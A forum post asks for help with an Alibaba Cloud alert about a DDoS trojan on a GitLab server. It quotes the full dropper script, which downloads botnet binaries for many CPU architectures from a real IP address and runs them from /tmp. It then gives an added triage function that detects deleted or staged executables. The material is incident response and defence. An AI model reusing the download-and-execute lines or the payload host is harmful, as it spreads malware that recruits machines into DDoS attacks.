嘟嘟社区

[Unlimited traffic] Received an Alibaba Cloud security incident alert, can someone help me figure out what this is?


By the way, how is this IP so fast?

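Alert description: The detection model found that a DDoS trojan is running on your server. A DDoS trojan is a malicious program that receives commands on a compromised host and launches DDoS attacks against targets specified by the hacker.

Abnormal event details
File path: /var/opt/gitlab/gitlab-workhorse/kk6 (deleted)

Abnormal script content: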

```bash
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86;cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 >3AvA;chmod +x *;./3AvA x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips;cat gang123isgodloluaintgettingthesebinslikedammwtf.mips >3AvA;chmod +x *;./3AvA mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl;cat gang123isgodloluaintgettingthesebinslikedammwtf.mpsl >3AvA;chmod +x *;./3AvA mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm4 >3AvA;chmod +x *;./3AvA arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm5 >3AvA;chmod +x *;./3AvA arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm6 >3AvA;chmod +x *;./3AvA arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm7 >3AvA;chmod +x *;./3AvA arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc;cat gang123isgodloluaintgettingthesebinslikedammwtf.ppc >3AvA;chmod +x *;./3AvA ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k;cat gang123isgodloluaintgettingthesebinslikedammwtf.m68k >3AvA;chmod +x *;./3AvA m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4;cat gang123isgodloluaintgettingthesebinslikedammwtf.sh4 >3AvA;chmod +x *;./3AvA sh4
```

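A triage check for the condition in the alert above, added here as an example and not part of the original post or of Alibaba Cloud's tooling: the `(deleted)` suffix is how Linux reports, through `/proc/<pid>/exe`, an executable that was unlinked from disk while still running. The function name `scan_procs` and its output format are assumptions; the directory list comes from the `cd` chain in the script, plus `/run` because `/var/run` is normally a symlink to it.

```shell
#!/bin/sh
# Added triage example (not from the original post).
# Prints one line per process whose executable either
#   - was deleted after launch (exe link ends in " (deleted)"), or
#   - lives in a directory the dropper script tries to cd into.
# Output format (an assumption of this example): pid<TAB>reason<TAB>exe

# scan_procs [PROC_ROOT]   PROC_ROOT defaults to /proc
scan_procs() {
    sp_root="${1:-/proc}"
    for sp_dir in "$sp_root"/[0-9]*; do
        [ -d "$sp_dir" ] || continue
        sp_pid="${sp_dir##*/}"
        # readlink fails for kernel threads and for processes we may not
        # inspect (run as root to see every process); skip those.
        sp_exe="$(readlink "$sp_dir/exe" 2>/dev/null)" || continue
        sp_reason=""
        case "$sp_exe" in
            # Binary unlinked while running. Also seen on legitimate
            # processes after a package upgrade, so review each hit.
            *" (deleted)") sp_reason="deleted-exe" ;;
            # Directories from the script's "cd ... ||" chain.
            /tmp/*|/var/run/*|/run/*|/mnt/*|/root/*) sp_reason="staging-dir-exe" ;;
        esac
        [ -n "$sp_reason" ] && printf '%s\t%s\t%s\n' "$sp_pid" "$sp_reason" "$sp_exe"
    done
    return 0
}

# Scan the live system (or a copied /proc tree given as the first argument).
scan_procs "${1:-/proc}"
```

For a hit, `/proc/<pid>/exe` can still be copied out for analysis while the process is alive, even though the file is gone from its original path.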